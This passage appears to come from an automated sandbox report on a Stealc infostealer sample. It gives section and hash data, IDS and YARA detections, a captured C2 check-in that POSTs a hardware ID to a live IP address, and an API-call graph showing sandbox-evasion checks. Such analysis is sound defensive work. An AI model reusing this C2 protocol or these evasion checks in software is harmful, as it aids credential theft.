                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2490000x162006b27efa8aa047da9607979d404edca67unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x24a0000x2b00x2005e9df45403f220f1fa266fc9915d1efeFalse0.794921875data6.10420202828602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x24c0000x2990000x200e12f093340bce7c6508c28c7861301f6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                quxdhurw0x4e50000x1970000x196800b0d328b46d6ec18e3c0a824666a7f0dfFalse0.9946667435424354data7.9529360698674845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                mjwebezn0x67c0000x10000x400c2a5486ed9e3d75819f6ce42da6194a3False0.7646484375data5.975743947064024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x67d0000x30000x22009ca0343007c85b815624e4e23926e7afFalse0.06307444852941177DOS executable (COM)0.7783992948726706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0x67b4dc0x256ASCII text, with CRLF line terminators0.5100334448160535

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-11-25T06:36:05.519429+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 25, 2024 06:36:03.622224092 CET4973080192.168.2.4185.215.113.206
                                Nov 25, 2024 06:36:03.741846085 CET8049730185.215.113.206192.168.2.4
                                Nov 25, 2024 06:36:03.741960049 CET4973080192.168.2.4185.215.113.206
                                Nov 25, 2024 06:36:03.742223024 CET4973080192.168.2.4185.215.113.206
                                Nov 25, 2024 06:36:03.861721992 CET8049730185.215.113.206192.168.2.4
                                Nov 25, 2024 06:36:05.075124025 CET8049730185.215.113.206192.168.2.4
                                Nov 25, 2024 06:36:05.075222015 CET4973080192.168.2.4185.215.113.206
                                Nov 25, 2024 06:36:05.078025103 CET4973080192.168.2.4185.215.113.206
                                Nov 25, 2024 06:36:05.197520018 CET8049730185.215.113.206192.168.2.4
                                Nov 25, 2024 06:36:05.519344091 CET8049730185.215.113.206192.168.2.4
                                Nov 25, 2024 06:36:05.519428968 CET4973080192.168.2.4185.215.113.206
                                Nov 25, 2024 06:36:08.839973927 CET4973080192.168.2.4185.215.113.206

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449730185.215.113.206806724C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Nov 25, 2024 06:36:03.742223024 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Nov 25, 2024 06:36:05.075124025 CET203INHTTP/1.1 200 OK
                                Date: Mon, 25 Nov 2024 05:36:04 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Nov 25, 2024 06:36:05.078025103 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
                                Host: 185.215.113.206
                                Content-Length: 210
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 45 30 38 30 31 38 35 33 42 37 36 37 31 38 34 37 36 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a
                                Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"0CE0801853B7671847631------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"mars------ECGIIIDAKJDHJKFHIEBF--
                                Nov 25, 2024 06:36:05.519344091 CET210INHTTP/1.1 200 OK
                                Date: Mon, 25 Nov 2024 05:36:05 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:00:36:00
                                Start date:25/11/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xfb0000
                                File size:1'771'008 bytes
                                MD5 hash:EC2B785F84C4C57983920F431A8F78CE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1698627871.0000000005750000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:5.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.4%
                                  Total number of Nodes:1408
                                  Total number of Limit Nodes:28
                                  execution_graph 26550 fb8c79 malloc strcpy_s 26587 fb1b64 162 API calls 26571 fcf2f8 93 API calls 26539 fce0f9 140 API calls 26588 fc6b79 138 API calls 26552 fc4c77 295 API calls 26553 fd8471 121 API calls 2 library calls 25102 fd1bf0 25154 fb2a90 25102->25154 25106 fd1c03 25107 fd1c29 lstrcpy 25106->25107 25108 fd1c35 25106->25108 25107->25108 25109 fd1c6d GetSystemInfo 25108->25109 25110 fd1c65 ExitProcess 25108->25110 25111 fd1c7d ExitProcess 25109->25111 25112 fd1c85 25109->25112 25255 fb1030 GetCurrentProcess VirtualAllocExNuma 25112->25255 25117 fd1cb8 25267 fd2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25117->25267 25118 fd1ca2 25118->25117 25119 fd1cb0 ExitProcess 25118->25119 25121 fd1cbd 25122 fd1ce7 lstrlen 25121->25122 25476 fd2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25121->25476 25126 fd1cff 25122->25126 25124 fd1cd1 25124->25122 25128 fd1ce0 ExitProcess 25124->25128 25125 fd1d23 lstrlen 25127 fd1d39 25125->25127 25126->25125 25129 fd1d13 lstrcpy lstrcat 25126->25129 25130 fd1d5a 25127->25130 25131 fd1d46 lstrcpy lstrcat 25127->25131 25129->25125 25132 fd2ad0 3 API calls 25130->25132 25131->25130 25133 fd1d5f lstrlen 25132->25133 25135 fd1d74 25133->25135 25134 fd1d9a lstrlen 25136 fd1db0 25134->25136 25135->25134 25137 fd1d87 lstrcpy lstrcat 25135->25137 25138 fd1dce 25136->25138 25140 fd1dba lstrcpy lstrcat 25136->25140 25137->25134 25269 fd2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25138->25269 25140->25138 25141 fd1dd3 lstrlen 25142 fd1de7 25141->25142 25143 fd1df7 lstrcpy lstrcat 25142->25143 25144 fd1e0a 25142->25144 25143->25144 25145 fd1e28 lstrcpy 25144->25145 25146 fd1e30 25144->25146 25145->25146 25147 fd1e56 OpenEventA 25146->25147 25148 fd1e8c CreateEventA 25147->25148 25149 fd1e68 CloseHandle Sleep OpenEventA 25147->25149 25270 fd1b20 GetSystemTime 25148->25270 25149->25148 25149->25149 25153 fd1ea5 CloseHandle ExitProcess 25477 fb4a60 25154->25477 25156 fb2aa1 25157 fb4a60 2 API calls 25156->25157 25158 fb2ab7 25157->25158 25159 fb4a60 2 API calls 25158->25159 25160 fb2acd 25159->25160 25161 fb4a60 2 API calls 25160->25161 25162 fb2ae3 25161->25162 25163 fb4a60 2 API calls 25162->25163 25164 fb2af9 25163->25164 25165 fb4a60 2 API calls 25164->25165 25166 fb2b0f 25165->25166 25167 fb4a60 2 API calls 25166->25167 25168 fb2b28 25167->25168 25169 fb4a60 2 API calls 25168->25169 25170 fb2b3e 25169->25170 25171 fb4a60 2 API calls 25170->25171 25172 fb2b54 25171->25172 25173 fb4a60 2 API calls 25172->25173 25174 fb2b6a 25173->25174 25175 fb4a60 2 API calls 25174->25175 25176 fb2b80 25175->25176 25177 fb4a60 2 API calls 25176->25177 25178 fb2b96 25177->25178 25179 fb4a60 2 API calls 25178->25179 25180 fb2baf 25179->25180 25181 fb4a60 2 API calls 25180->25181 25182 fb2bc5 25181->25182 25183 fb4a60 2 API calls 25182->25183 25184 fb2bdb 25183->25184 25185 fb4a60 2 API calls 25184->25185 25186 fb2bf1 25185->25186 25187 fb4a60 2 API calls 25186->25187 25188 fb2c07 25187->25188 25189 fb4a60 2 API calls 25188->25189 25190 fb2c1d 25189->25190 25191 fb4a60 2 API calls 25190->25191 25192 fb2c36 25191->25192 25193 fb4a60 2 API calls 25192->25193 25194 fb2c4c 25193->25194 25195 fb4a60 2 API calls 25194->25195 25196 fb2c62 25195->25196 25197 fb4a60 2 API calls 25196->25197 25198 fb2c78 25197->25198 25199 fb4a60 2 API calls 25198->25199 25200 fb2c8e 25199->25200 25201 fb4a60 2 API calls 25200->25201 25202 fb2ca4 25201->25202 25203 fb4a60 2 API calls 25202->25203 25204 fb2cbd 25203->25204 25205 fb4a60 2 API calls 25204->25205 25206 fb2cd3 25205->25206 25207 fb4a60 2 API calls 25206->25207 25208 fb2ce9 25207->25208 25209 fb4a60 2 API calls 25208->25209 25210 fb2cff 25209->25210 25211 fb4a60 2 API calls 25210->25211 25212 fb2d15 25211->25212 25213 fb4a60 2 API calls 25212->25213 25214 fb2d2b 25213->25214 25215 fb4a60 2 API calls 25214->25215 25216 fb2d44 25215->25216 25217 fb4a60 2 API calls 25216->25217 25218 fb2d5a 25217->25218 25219 fb4a60 2 API calls 25218->25219 25220 fb2d70 25219->25220 25221 fb4a60 2 API calls 25220->25221 25222 fb2d86 25221->25222 25223 fb4a60 2 API calls 25222->25223 25224 fb2d9c 25223->25224 25225 fb4a60 2 API calls 25224->25225 25226 fb2db2 25225->25226 25227 fb4a60 2 API calls 25226->25227 25228 fb2dcb 25227->25228 25229 fb4a60 2 API calls 25228->25229 25230 fb2de1 25229->25230 25231 fb4a60 2 API calls 25230->25231 25232 fb2df7 25231->25232 25233 fb4a60 2 API calls 25232->25233 25234 fb2e0d 25233->25234 25235 fb4a60 2 API calls 25234->25235 25236 fb2e23 25235->25236 25237 fb4a60 2 API calls 25236->25237 25238 fb2e39 25237->25238 25239 fb4a60 2 API calls 25238->25239 25240 fb2e52 25239->25240 25241 fd6390 GetPEB 25240->25241 25242 fd65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25241->25242 25243 fd63c3 25241->25243 25244 fd6638 25242->25244 25245 fd6625 GetProcAddress 25242->25245 25252 fd63d7 20 API calls 25243->25252 25246 fd666c 25244->25246 25247 fd6641 GetProcAddress GetProcAddress 25244->25247 25245->25244 25248 fd6688 25246->25248 25249 fd6675 GetProcAddress 25246->25249 25247->25246 25250 fd66a4 25248->25250 25251 fd6691 GetProcAddress 25248->25251 25249->25248 25253 fd66ad GetProcAddress GetProcAddress 25250->25253 25254 fd66d7 25250->25254 25251->25250 25252->25242 25253->25254 25254->25106 25256 fb105e VirtualAlloc 25255->25256 25257 fb1057 ExitProcess 25255->25257 25258 fb107d 25256->25258 25259 fb108a VirtualFree 25258->25259 25260 fb10b1 25258->25260 25259->25260 25261 fb10c0 25260->25261 25262 fb10d0 GlobalMemoryStatusEx 25261->25262 25264 fb1112 ExitProcess 25262->25264 25266 fb10f5 25262->25266 25265 fb111a GetUserDefaultLangID 25265->25117 25265->25118 25266->25264 25266->25265 25268 fd2b24 25267->25268 25268->25121 25269->25141 25482 fd1820 25270->25482 25272 fd1b81 sscanf 25521 fb2a20 25272->25521 25275 fd1be9 25278 fcffd0 25275->25278 25276 fd1bd6 25276->25275 25277 fd1be2 ExitProcess 25276->25277 25279 fcffe0 25278->25279 25280 fd000d lstrcpy 25279->25280 25281 fd0019 lstrlen 25279->25281 25280->25281 25282 fd00d0 25281->25282 25283 fd00db lstrcpy 25282->25283 25284 fd00e7 lstrlen 25282->25284 25283->25284 25285 fd00ff 25284->25285 25286 fd010a lstrcpy 25285->25286 25287 fd0116 lstrlen 25285->25287 25286->25287 25288 fd012e 25287->25288 25289 fd0139 lstrcpy 25288->25289 25290 fd0145 25288->25290 25289->25290 25523 fd1570 25290->25523 25293 fd016e 25294 fd018f lstrlen 25293->25294 25295 fd0183 lstrcpy 25293->25295 25296 fd01a8 25294->25296 25295->25294 25297 fd01bd lstrcpy 25296->25297 25298 fd01c9 lstrlen 25296->25298 25297->25298 25299 fd01e8 25298->25299 25300 fd020c lstrlen 25299->25300 25301 fd0200 lstrcpy 25299->25301 25302 fd026a 25300->25302 25301->25300 25303 fd0282 lstrcpy 25302->25303 25304 fd028e 25302->25304 25303->25304 25533 fb2e70 25304->25533 25312 fd0540 25313 fd1570 4 API calls 25312->25313 25314 fd054f 25313->25314 25315 fd05a1 lstrlen 25314->25315 25316 fd0599 lstrcpy 25314->25316 25317 fd05bf 25315->25317 25316->25315 25318 fd05d1 lstrcpy lstrcat 25317->25318 25319 fd05e9 25317->25319 25318->25319 25320 fd0614 25319->25320 25321 fd060c lstrcpy 25319->25321 25322 fd061b lstrlen 25320->25322 25321->25320 25323 fd0636 25322->25323 25324 fd064a lstrcpy lstrcat 25323->25324 25325 fd0662 25323->25325 25324->25325 25326 fd0687 25325->25326 25327 fd067f lstrcpy 25325->25327 25328 fd068e lstrlen 25326->25328 25327->25326 25329 fd06b3 25328->25329 25330 fd06c7 lstrcpy lstrcat 25329->25330 25331 fd06db 25329->25331 25330->25331 25332 fd0704 lstrcpy 25331->25332 25333 fd070c 25331->25333 25332->25333 25334 fd0749 lstrcpy 25333->25334 25335 fd0751 25333->25335 25334->25335 26289 fd2740 GetWindowsDirectoryA 25335->26289 25337 fd0785 26298 fb4c50 25337->26298 25338 fd075d 25338->25337 25339 fd077d lstrcpy 25338->25339 25339->25337 25341 fd078f 26452 fc8ca0 StrCmpCA 25341->26452 25343 fd079b 25344 fb1530 8 API calls 25343->25344 25345 fd07bc 25344->25345 25346 fd07ed 25345->25346 25347 fd07e5 lstrcpy 25345->25347 26470 fb60d0 80 API calls 25346->26470 25347->25346 25349 fd07fa 26471 fc81b0 10 API calls 25349->26471 25351 fd0809 25352 fb1530 8 API calls 25351->25352 25353 fd082f 25352->25353 25354 fd085e 25353->25354 25355 fd0856 lstrcpy 25353->25355 26472 fb60d0 80 API calls 25354->26472 25355->25354 25357 fd086b 26473 fc7ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 25357->26473 25359 fd0876 25360 fb1530 8 API calls 25359->25360 25361 fd08a1 25360->25361 25362 fd08c9 lstrcpy 25361->25362 25363 fd08d5 25361->25363 25362->25363 26474 fb60d0 80 API calls 25363->26474 25365 fd08db 26475 fc8050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 25365->26475 25367 fd08e6 25368 fb1530 8 API calls 25367->25368 25369 fd08f7 25368->25369 25370 fd092e 25369->25370 25371 fd0926 lstrcpy 25369->25371 26476 fb5640 8 API calls 25370->26476 25371->25370 25373 fd0933 25374 fb1530 8 API calls 25373->25374 25375 fd094c 25374->25375 26477 fc7280 1457 API calls 25375->26477 25377 fd099f 25378 fb1530 8 API calls 25377->25378 25379 fd09cf 25378->25379 25380 fd09fe 25379->25380 25381 fd09f6 lstrcpy 25379->25381 26478 fb60d0 80 API calls 25380->26478 25381->25380 25383 fd0a0b 26479 fc83e0 7 API calls 25383->26479 25385 fd0a18 25386 fb1530 8 API calls 25385->25386 25387 fd0a29 25386->25387 26480 fb24e0 230 API calls 25387->26480 25389 fd0a6b 25390 fd0a7f 25389->25390 25391 fd0b40 25389->25391 25392 fb1530 8 API calls 25390->25392 25393 fb1530 8 API calls 25391->25393 25394 fd0aa5 25392->25394 25395 fd0b59 25393->25395 25398 fd0acc lstrcpy 25394->25398 25399 fd0ad4 25394->25399 25396 fd0b87 25395->25396 25400 fd0b7f lstrcpy 25395->25400 26484 fb60d0 80 API calls 25396->26484 25398->25399 26481 fb60d0 80 API calls 25399->26481 25400->25396 25402 fd0b8d 26485 fcc840 70 API calls 25402->26485 25403 fd0ada 26482 fc85b0 47 API calls 25403->26482 25406 fd0b38 25409 fd0bd1 25406->25409 25412 fb1530 8 API calls 25406->25412 25407 fd0ae5 25408 fb1530 8 API calls 25407->25408 25411 fd0af6 25408->25411 25410 fd0bfa 25409->25410 25413 fb1530 8 API calls 25409->25413 25414 fd0c23 25410->25414 25418 fb1530 8 API calls 25410->25418 26483 fcd0f0 118 API calls 25411->26483 25416 fd0bb9 25412->25416 25417 fd0bf5 25413->25417 25420 fd0c4c 25414->25420 25425 fb1530 8 API calls 25414->25425 26486 fcd7b0 103 API calls __crtGetStringTypeA_stat 25416->26486 26488 fcdfa0 149 API calls 25417->26488 25423 fd0c1e 25418->25423 25421 fd0c75 25420->25421 25426 fb1530 8 API calls 25420->25426 25427 fd0c9e 25421->25427 25432 fb1530 8 API calls 25421->25432 26489 fce500 108 API calls 25423->26489 25424 fd0bbe 25429 fb1530 8 API calls 25424->25429 25430 fd0c47 25425->25430 25431 fd0c70 25426->25431 25434 fd0cc7 25427->25434 25440 fb1530 8 API calls 25427->25440 25433 fd0bcc 25429->25433 26490 fce720 120 API calls 25430->26490 26491 fce9e0 110 API calls 25431->26491 25438 fd0c99 25432->25438 26487 fcecb0 99 API calls 25433->26487 25436 fd0cf0 25434->25436 25442 fb1530 8 API calls 25434->25442 25443 fd0dca 25436->25443 25444 fd0d04 25436->25444 26492 fb7bc0 155 API calls 25438->26492 25441 fd0cc2 25440->25441 26493 fceb70 108 API calls 25441->26493 25447 fd0ceb 25442->25447 25449 fb1530 8 API calls 25443->25449 25448 fb1530 8 API calls 25444->25448 26494 fd41e0 91 API calls 25447->26494 25451 fd0d2a 25448->25451 25452 fd0de3 25449->25452 25454 fd0d5e 25451->25454 25455 fd0d56 lstrcpy 25451->25455 25453 fd0e11 25452->25453 25456 fd0e09 lstrcpy 25452->25456 26498 fb60d0 80 API calls 25453->26498 26495 fb60d0 80 API calls 25454->26495 25455->25454 25456->25453 25459 fd0e17 26499 fcc840 70 API calls 25459->26499 25460 fd0d64 26496 fc85b0 47 API calls 25460->26496 25463 fd0dc2 25466 fb1530 8 API calls 25463->25466 25464 fd0d6f 25465 fb1530 8 API calls 25464->25465 25467 fd0d80 25465->25467 25469 fd0e39 25466->25469 26497 fcd0f0 118 API calls 25467->26497 25470 fd0e67 25469->25470 25472 fd0e5f lstrcpy 25469->25472 26500 fb60d0 80 API calls 25470->26500 25472->25470 25473 fd0e74 25475 fd0e95 25473->25475 26501 fd1660 12 API calls 25473->26501 25475->25153 25476->25124 25478 fb4a76 RtlAllocateHeap 25477->25478 25481 fb4ab4 VirtualProtect 25478->25481 25481->25156 25483 fd182e 25482->25483 25484 fd1849 lstrcpy 25483->25484 25485 fd1855 lstrlen 25483->25485 25484->25485 25486 fd1873 25485->25486 25487 fd1885 lstrcpy lstrcat 25486->25487 25488 fd1898 25486->25488 25487->25488 25489 fd18c7 25488->25489 25490 fd18bf lstrcpy 25488->25490 25491 fd18ce lstrlen 25489->25491 25490->25489 25492 fd18e6 25491->25492 25493 fd18f2 lstrcpy lstrcat 25492->25493 25494 fd1906 25492->25494 25493->25494 25495 fd1935 25494->25495 25496 fd192d lstrcpy 25494->25496 25497 fd193c lstrlen 25495->25497 25496->25495 25498 fd1958 25497->25498 25499 fd196a lstrcpy lstrcat 25498->25499 25500 fd197d 25498->25500 25499->25500 25501 fd19ac 25500->25501 25502 fd19a4 lstrcpy 25500->25502 25503 fd19b3 lstrlen 25501->25503 25502->25501 25504 fd19cb 25503->25504 25505 fd19d7 lstrcpy lstrcat 25504->25505 25506 fd19eb 25504->25506 25505->25506 25507 fd1a1a 25506->25507 25508 fd1a12 lstrcpy 25506->25508 25509 fd1a21 lstrlen 25507->25509 25508->25507 25510 fd1a3d 25509->25510 25511 fd1a4f lstrcpy lstrcat 25510->25511 25512 fd1a62 25510->25512 25511->25512 25513 fd1a89 lstrcpy 25512->25513 25514 fd1a91 25512->25514 25513->25514 25515 fd1a98 lstrlen 25514->25515 25516 fd1ab4 25515->25516 25517 fd1ac6 lstrcpy lstrcat 25516->25517 25518 fd1ad9 25516->25518 25517->25518 25519 fd1b08 25518->25519 25520 fd1b00 lstrcpy 25518->25520 25519->25272 25520->25519 25522 fb2a24 SystemTimeToFileTime SystemTimeToFileTime 25521->25522 25522->25275 25522->25276 25524 fd157f 25523->25524 25525 fd159f lstrcpy 25524->25525 25526 fd15a7 25524->25526 25525->25526 25527 fd15d7 lstrcpy 25526->25527 25528 fd15df 25526->25528 25527->25528 25529 fd160f lstrcpy 25528->25529 25530 fd1617 25528->25530 25529->25530 25531 fd0155 lstrlen 25530->25531 25532 fd1647 lstrcpy 25530->25532 25531->25293 25532->25531 25534 fb4a60 2 API calls 25533->25534 25535 fb2e82 25534->25535 25536 fb4a60 2 API calls 25535->25536 25537 fb2ea0 25536->25537 25538 fb4a60 2 API calls 25537->25538 25539 fb2eb6 25538->25539 25540 fb4a60 2 API calls 25539->25540 25541 fb2ecb 25540->25541 25542 fb4a60 2 API calls 25541->25542 25543 fb2eec 25542->25543 25544 fb4a60 2 API calls 25543->25544 25545 fb2f01 25544->25545 25546 fb4a60 2 API calls 25545->25546 25547 fb2f19 25546->25547 25548 fb4a60 2 API calls 25547->25548 25549 fb2f3a 25548->25549 25550 fb4a60 2 API calls 25549->25550 25551 fb2f4f 25550->25551 25552 fb4a60 2 API calls 25551->25552 25553 fb2f65 25552->25553 25554 fb4a60 2 API calls 25553->25554 25555 fb2f7b 25554->25555 25556 fb4a60 2 API calls 25555->25556 25557 fb2f91 25556->25557 25558 fb4a60 2 API calls 25557->25558 25559 fb2faa 25558->25559 25560 fb4a60 2 API calls 25559->25560 25561 fb2fc0 25560->25561 25562 fb4a60 2 API calls 25561->25562 25563 fb2fd6 25562->25563 25564 fb4a60 2 API calls 25563->25564 25565 fb2fec 25564->25565 25566 fb4a60 2 API calls 25565->25566 25567 fb3002 25566->25567 25568 fb4a60 2 API calls 25567->25568 25569 fb3018 25568->25569 25570 fb4a60 2 API calls 25569->25570 25571 fb3031 25570->25571 25572 fb4a60 2 API calls 25571->25572 25573 fb3047 25572->25573 25574 fb4a60 2 API calls 25573->25574 25575 fb305d 25574->25575 25576 fb4a60 2 API calls 25575->25576 25577 fb3073 25576->25577 25578 fb4a60 2 API calls 25577->25578 25579 fb3089 25578->25579 25580 fb4a60 2 API calls 25579->25580 25581 fb309f 25580->25581 25582 fb4a60 2 API calls 25581->25582 25583 fb30b8 25582->25583 25584 fb4a60 2 API calls 25583->25584 25585 fb30ce 25584->25585 25586 fb4a60 2 API calls 25585->25586 25587 fb30e4 25586->25587 25588 fb4a60 2 API calls 25587->25588 25589 fb30fa 25588->25589 25590 fb4a60 2 API calls 25589->25590 25591 fb3110 25590->25591 25592 fb4a60 2 API calls 25591->25592 25593 fb3126 25592->25593 25594 fb4a60 2 API calls 25593->25594 25595 fb313f 25594->25595 25596 fb4a60 2 API calls 25595->25596 25597 fb3155 25596->25597 25598 fb4a60 2 API calls 25597->25598 25599 fb316b 25598->25599 25600 fb4a60 2 API calls 25599->25600 25601 fb3181 25600->25601 25602 fb4a60 2 API calls 25601->25602 25603 fb3197 25602->25603 25604 fb4a60 2 API calls 25603->25604 25605 fb31ad 25604->25605 25606 fb4a60 2 API calls 25605->25606 25607 fb31c6 25606->25607 25608 fb4a60 2 API calls 25607->25608 25609 fb31dc 25608->25609 25610 fb4a60 2 API calls 25609->25610 25611 fb31f2 25610->25611 25612 fb4a60 2 API calls 25611->25612 25613 fb3208 25612->25613 25614 fb4a60 2 API calls 25613->25614 25615 fb321e 25614->25615 25616 fb4a60 2 API calls 25615->25616 25617 fb3234 25616->25617 25618 fb4a60 2 API calls 25617->25618 25619 fb324d 25618->25619 25620 fb4a60 2 API calls 25619->25620 25621 fb3263 25620->25621 25622 fb4a60 2 API calls 25621->25622 25623 fb3279 25622->25623 25624 fb4a60 2 API calls 25623->25624 25625 fb328f 25624->25625 25626 fb4a60 2 API calls 25625->25626 25627 fb32a5 25626->25627 25628 fb4a60 2 API calls 25627->25628 25629 fb32bb 25628->25629 25630 fb4a60 2 API calls 25629->25630 25631 fb32d4 25630->25631 25632 fb4a60 2 API calls 25631->25632 25633 fb32ea 25632->25633 25634 fb4a60 2 API calls 25633->25634 25635 fb3300 25634->25635 25636 fb4a60 2 API calls 25635->25636 25637 fb3316 25636->25637 25638 fb4a60 2 API calls 25637->25638 25639 fb332c 25638->25639 25640 fb4a60 2 API calls 25639->25640 25641 fb3342 25640->25641 25642 fb4a60 2 API calls 25641->25642 25643 fb335b 25642->25643 25644 fb4a60 2 API calls 25643->25644 25645 fb3371 25644->25645 25646 fb4a60 2 API calls 25645->25646 25647 fb3387 25646->25647 25648 fb4a60 2 API calls 25647->25648 25649 fb339d 25648->25649 25650 fb4a60 2 API calls 25649->25650 25651 fb33b3 25650->25651 25652 fb4a60 2 API calls 25651->25652 25653 fb33c9 25652->25653 25654 fb4a60 2 API calls 25653->25654 25655 fb33e2 25654->25655 25656 fb4a60 2 API calls 25655->25656 25657 fb33f8 25656->25657 25658 fb4a60 2 API calls 25657->25658 25659 fb340e 25658->25659 25660 fb4a60 2 API calls 25659->25660 25661 fb3424 25660->25661 25662 fb4a60 2 API calls 25661->25662 25663 fb343a 25662->25663 25664 fb4a60 2 API calls 25663->25664 25665 fb3450 25664->25665 25666 fb4a60 2 API calls 25665->25666 25667 fb3469 25666->25667 25668 fb4a60 2 API calls 25667->25668 25669 fb347f 25668->25669 25670 fb4a60 2 API calls 25669->25670 25671 fb3495 25670->25671 25672 fb4a60 2 API calls 25671->25672 25673 fb34ab 25672->25673 25674 fb4a60 2 API calls 25673->25674 25675 fb34c1 25674->25675 25676 fb4a60 2 API calls 25675->25676 25677 fb34d7 25676->25677 25678 fb4a60 2 API calls 25677->25678 25679 fb34f0 25678->25679 25680 fb4a60 2 API calls 25679->25680 25681 fb3506 25680->25681 25682 fb4a60 2 API calls 25681->25682 25683 fb351c 25682->25683 25684 fb4a60 2 API calls 25683->25684 25685 fb3532 25684->25685 25686 fb4a60 2 API calls 25685->25686 25687 fb3548 25686->25687 25688 fb4a60 2 API calls 25687->25688 25689 fb355e 25688->25689 25690 fb4a60 2 API 